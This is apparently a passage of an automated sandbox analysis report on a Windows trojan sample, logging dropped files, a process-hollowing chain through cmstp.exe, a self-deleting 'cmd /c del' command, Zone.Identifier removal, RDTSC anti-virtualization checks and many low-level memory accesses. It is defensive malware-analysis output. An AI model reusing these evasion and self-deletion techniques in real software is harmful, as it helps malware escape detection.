          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\583475.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\583475.exe.logJump to behavior
          Source: C:\Users\user\Desktop\583475.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/2@4/3
          Source: C:\Users\user\Desktop\583475.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: 583475.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
          Source: C:\Users\user\Desktop\583475.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\583475.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: 583475.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: 583475.exeStatic file information: File size 1085952 > 1048576
          Source: 583475.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 583475.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x108800
          Source: 583475.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: cmstp.pdbGCTL source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdb source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, cmstp.exe, 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, 00000007.00000000.731556294.0000000000892000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_00845EAE push ebx; retf 0_2_00845EAF
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067CEE70 push E8FFFFFFh; retf 0_2_067CEE75
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041B87C push eax; ret 7_2_0041B882
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041B812 push eax; ret 7_2_0041B818
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041B81B push eax; ret 7_2_0041B882
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00407A17 push cs; iretd 7_2_00407A1F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004152CE push edi; ret 7_2_00415355
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004152FD push edi; ret 7_2_00415355
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00415CCC push esp; iretd 7_2_00415CCD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00414DAE push esi; iretd 7_2_00414DB2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00414ED0 push ds; ret 7_2_00414ED1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041B7C5 push eax; ret 7_2_0041B818
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0136D0D1 push ecx; ret 7_2_0136D0E4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E8D0D1 push ecx; ret 17_2_04E8D0E4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA52FD push edi; ret 17_2_02FA5355
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA52CE push edi; ret 17_2_02FA5355
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02F97A17 push cs; iretd 17_2_02F97A1F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FABBF4 push 00000009h; iretd 17_2_02FABBF6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAB87C push eax; ret 17_2_02FAB882
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAB81B push eax; ret 17_2_02FAB882
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAB812 push eax; ret 17_2_02FAB818
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA4ED0 push ds; ret 17_2_02FA4ED1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAC699 push eax; retf 17_2_02FAC69A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAB7C5 push eax; ret 17_2_02FAB818
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA5CCC push esp; iretd 17_2_02FA5CCD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA4DAE push esi; iretd 17_2_02FA4DB2
          Source: 583475.exe, Fq2/r8Q.csHigh entropy of concatenated method names: '.ctor', 'a8H', 'i8R', 'Tp4', 's7W', 'Gi4', 'n6D', 'Zg2', 'Rd8', 'a7R'
          Source: 583475.exe, Yt9/r5P.csHigh entropy of concatenated method names: '.ctor', 'x5F', 'f0T7', 'Nk53', 'i6R4', 's8LZ', 'Ro40', 'Lx8s', 'j2SA', 'Kn62'
          Source: 583475.exe, Je1w/Ec5i.csHigh entropy of concatenated method names: '.ctor', 'Cc0d', 'a5TL', 'Jz3c', 'p8KW', 'Jq19', 'Nn28', 'Pg1b', 'g2MY', 'w7KA'
          Source: 583475.exe, f4J/Cx3.csHigh entropy of concatenated method names: '.ctor', 'Yq7', 'Ep4', 't8H', 'Zw4', 'g3J', 'j5W', 'z1M', 'a7M', 'Et3'
          Source: 583475.exe, m1DY/f0L8.csHigh entropy of concatenated method names: '.ctor', 'Ym5r', 'Wa9g', 'm3W5', 'Py7i', 'Ak85', 'Wc18', 'An10', 'a6TP', 'Mo97'
          Source: 583475.exe, Qg54/Xy40.csHigh entropy of concatenated method names: '.ctor', 'f5RG', 'Nq3a', 'Ta51', 'c4Q1', 't5A2', 'Qx0n', 'm6J1', 'z2SN', 'd4P1'
          Source: 583475.exe, f6L/i0X.csHigh entropy of concatenated method names: '.ctor', 'n9X', 's0G', 'Gm4', 'Rf7', 'Ws0', 'Dn2', 'Wr6', 'o9W', 'Nb6'
          Source: 583475.exe, Lk6/Jg7.csHigh entropy of concatenated method names: '.ctor', 'Sq0', 'Fb1', 'Wa5', 'Nz6', 'i6E', 'Tr4', 'Kd6', 'c5J', 'Qe1'
          Source: 583475.exe, Sq2/Hn1.csHigh entropy of concatenated method names: '.ctor', 'Cz5', 'Qd4', 'Mj2', 'Cq2', 'Gw5', 'Zb8', 'Ez7', 's8M', 'Lz7'
          Source: 583475.exe, f1R0/p0M1.csHigh entropy of concatenated method names: '.ctor', 'Jx71', 'Ci1s', 'Dm7f', 's5FA', 'Bb5j', 'Jg47', 'Ly51', 'Cm95', 'Bs8f'
          Source: C:\Users\user\Desktop\583475.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\583475.exe File opened: C:\Users\user\Desktop\583475.exe\:Zone.Identifier read attributes | delete
          Source: C:\Users\user\Desktop\583475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002F98604 second address: 0000000002F9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002F9898E second address: 0000000002F98994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\583475.exe TID: 6416Thread sleep time: -14757395258967632s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\583475.exe TID: 6416Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\583475.exe TID: 4684Thread sleep count: 502 > 30Jump to behavior
          Source: C:\Users\user\Desktop\583475.exe TID: 4684Thread sleep count: 9368 > 30Jump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004088C0 rdtsc 7_2_004088C0
          Source: C:\Users\user\Desktop\583475.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\583475.exeWindow / User API: threadDelayed 502Jump to behavior
          Source: C:\Users\user\Desktop\583475.exeWindow / User API: threadDelayed 9368Jump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeThread delayed: delay time: 30000Jump to behavior
          Source: 583475.exeBinary or memory string: IHGFSD
          Source: explorer.exe, 00000009.00000000.783820666.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.780685564.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.761406468.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000009.00000000.751150955.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000009.00000000.766952588.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Users\user\Desktop\583475.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131AD30 mov eax, dword ptr fs:[00000030h]7_2_0131AD30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]7_2_01323D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8D34 mov eax, dword ptr fs:[00000030h]7_2_013E8D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134513A mov eax, dword ptr fs:[00000030h]7_2_0134513A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0139A537 mov eax, dword ptr fs:[00000030h]7_2_0139A537
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01344D3B mov eax, dword ptr fs:[00000030h]7_2_01344D3B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01334120 mov eax, dword ptr fs:[00000030h]7_2_01334120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01334120 mov ecx, dword ptr fs:[00000030h]7_2_01334120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319100 mov eax, dword ptr fs:[00000030h]7_2_01319100
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131B171 mov eax, dword ptr fs:[00000030h]7_2_0131B171
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133C577 mov eax, dword ptr fs:[00000030h]7_2_0133C577
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C962 mov eax, dword ptr fs:[00000030h]7_2_0131C962
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01337D50 mov eax, dword ptr fs:[00000030h]7_2_01337D50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01353D43 mov eax, dword ptr fs:[00000030h]7_2_01353D43
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133B944 mov eax, dword ptr fs:[00000030h]7_2_0133B944
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01393540 mov eax, dword ptr fs:[00000030h]7_2_01393540
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01341DB5 mov eax, dword ptr fs:[00000030h]7_2_01341DB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013951BE mov eax, dword ptr fs:[00000030h]7_2_013951BE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E05AC mov eax, dword ptr fs:[00000030h]7_2_013E05AC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E05AC mov eax, dword ptr fs:[00000030h]7_2_013E05AC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013461A0 mov eax, dword ptr fs:[00000030h]7_2_013461A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013461A0 mov eax, dword ptr fs:[00000030h]7_2_013461A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013435A1 mov eax, dword ptr fs:[00000030h]7_2_013435A1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013969A6 mov eax, dword ptr fs:[00000030h]7_2_013969A6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342990 mov eax, dword ptr fs:[00000030h]7_2_01342990
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134FD9B mov eax, dword ptr fs:[00000030h]7_2_0134FD9B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134FD9B mov eax, dword ptr fs:[00000030h]7_2_0134FD9B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A185 mov eax, dword ptr fs:[00000030h]7_2_0134A185
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133C182 mov eax, dword ptr fs:[00000030h]7_2_0133C182
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342581 mov eax, dword ptr fs:[00000030h]7_2_01342581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342581 mov eax, dword ptr fs:[00000030h]7_2_01342581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342581 mov eax, dword ptr fs:[00000030h]7_2_01342581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342581 mov eax, dword ptr fs:[00000030h]7_2_01342581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01312D8A mov eax, dword ptr fs:[00000030h]7_2_01312D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01312D8A mov eax, dword ptr fs:[00000030h]7_2_01312D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01312D8A mov eax, dword ptr fs:[00000030h]7_2_01312D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01312D8A mov eax, dword ptr fs:[00000030h]7_2_01312D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01312D8A mov eax, dword ptr fs:[00000030h]7_2_01312D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013C8DF1 mov eax, dword ptr fs:[00000030h]7_2_013C8DF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131B1E1 mov eax, dword ptr fs:[00000030h]7_2_0131B1E1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131B1E1 mov eax, dword ptr fs:[00000030h]7_2_0131B1E1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131B1E1 mov eax, dword ptr fs:[00000030h]7_2_0131B1E1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013A41E8 mov eax, dword ptr fs:[00000030h]7_2_013A41E8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132D5E0 mov eax, dword ptr fs:[00000030h]7_2_0132D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132D5E0 mov eax, dword ptr fs:[00000030h]7_2_0132D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DFDE2 mov eax, dword ptr fs:[00000030h]7_2_013DFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DFDE2 mov eax, dword ptr fs:[00000030h]7_2_013DFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DFDE2 mov eax, dword ptr fs:[00000030h]7_2_013DFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DFDE2 mov eax, dword ptr fs:[00000030h]7_2_013DFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396DC9 mov eax, dword ptr fs:[00000030h]7_2_01396DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396DC9 mov eax, dword ptr fs:[00000030h]7_2_01396DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396DC9 mov eax, dword ptr fs:[00000030h]7_2_01396DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396DC9 mov ecx, dword ptr fs:[00000030h]7_2_01396DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396DC9 mov eax, dword ptr fs:[00000030h]7_2_01396DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396DC9 mov eax, dword ptr fs:[00000030h]7_2_01396DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132B02A mov eax, dword ptr fs:[00000030h]7_2_0132B02A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132B02A mov eax, dword ptr fs:[00000030h]7_2_0132B02A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132B02A mov eax, dword ptr fs:[00000030h]7_2_0132B02A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132B02A mov eax, dword ptr fs:[00000030h]7_2_0132B02A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134BC2C mov eax, dword ptr fs:[00000030h]7_2_0134BC2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134002D mov eax, dword ptr fs:[00000030h]7_2_0134002D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134002D mov eax, dword ptr fs:[00000030h]7_2_0134002D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134002D mov eax, dword ptr fs:[00000030h]7_2_0134002D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134002D mov eax, dword ptr fs:[00000030h]7_2_0134002D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134002D mov eax, dword ptr fs:[00000030h]7_2_0134002D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E4015 mov eax, dword ptr fs:[00000030h]7_2_013E4015
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E4015 mov eax, dword ptr fs:[00000030h]7_2_013E4015
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397016 mov eax, dword ptr fs:[00000030h]7_2_01397016
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397016 mov eax, dword ptr fs:[00000030h]7_2_01397016
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397016 mov eax, dword ptr fs:[00000030h]7_2_01397016
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E740D mov eax, dword ptr fs:[00000030h]7_2_013E740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E740D mov eax, dword ptr fs:[00000030h]7_2_013E740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E740D mov eax, dword ptr fs:[00000030h]7_2_013E740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396C0A mov eax, dword ptr fs:[00000030h]7_2_01396C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396C0A mov eax, dword ptr fs:[00000030h]7_2_01396C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396C0A mov eax, dword ptr fs:[00000030h]7_2_01396C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396C0A mov eax, dword ptr fs:[00000030h]7_2_01396C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]7_2_013D1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E1074 mov eax, dword ptr fs:[00000030h]7_2_013E1074
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D2073 mov eax, dword ptr fs:[00000030h]7_2_013D2073
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133746D mov eax, dword ptr fs:[00000030h]7_2_0133746D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01330050 mov eax, dword ptr fs:[00000030h]7_2_01330050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01330050 mov eax, dword ptr fs:[00000030h]7_2_01330050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AC450 mov eax, dword ptr fs:[00000030h]7_2_013AC450
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AC450 mov eax, dword ptr fs:[00000030h]7_2_013AC450
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A44B mov eax, dword ptr fs:[00000030h]7_2_0134A44B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134F0BF mov ecx, dword ptr fs:[00000030h]7_2_0134F0BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134F0BF mov eax, dword ptr fs:[00000030h]7_2_0134F0BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134F0BF mov eax, dword ptr fs:[00000030h]7_2_0134F0BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]7_2_013420A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]7_2_013420A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]7_2_013420A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]7_2_013420A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]7_2_013420A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]7_2_013420A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013590AF mov eax, dword ptr fs:[00000030h]7_2_013590AF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132849B mov eax, dword ptr fs:[00000030h]7_2_0132849B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319080 mov eax, dword ptr fs:[00000030h]7_2_01319080
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01393884 mov eax, dword ptr fs:[00000030h]7_2_01393884
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01393884 mov eax, dword ptr fs:[00000030h]7_2_01393884
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D14FB mov eax, dword ptr fs:[00000030h]7_2_013D14FB
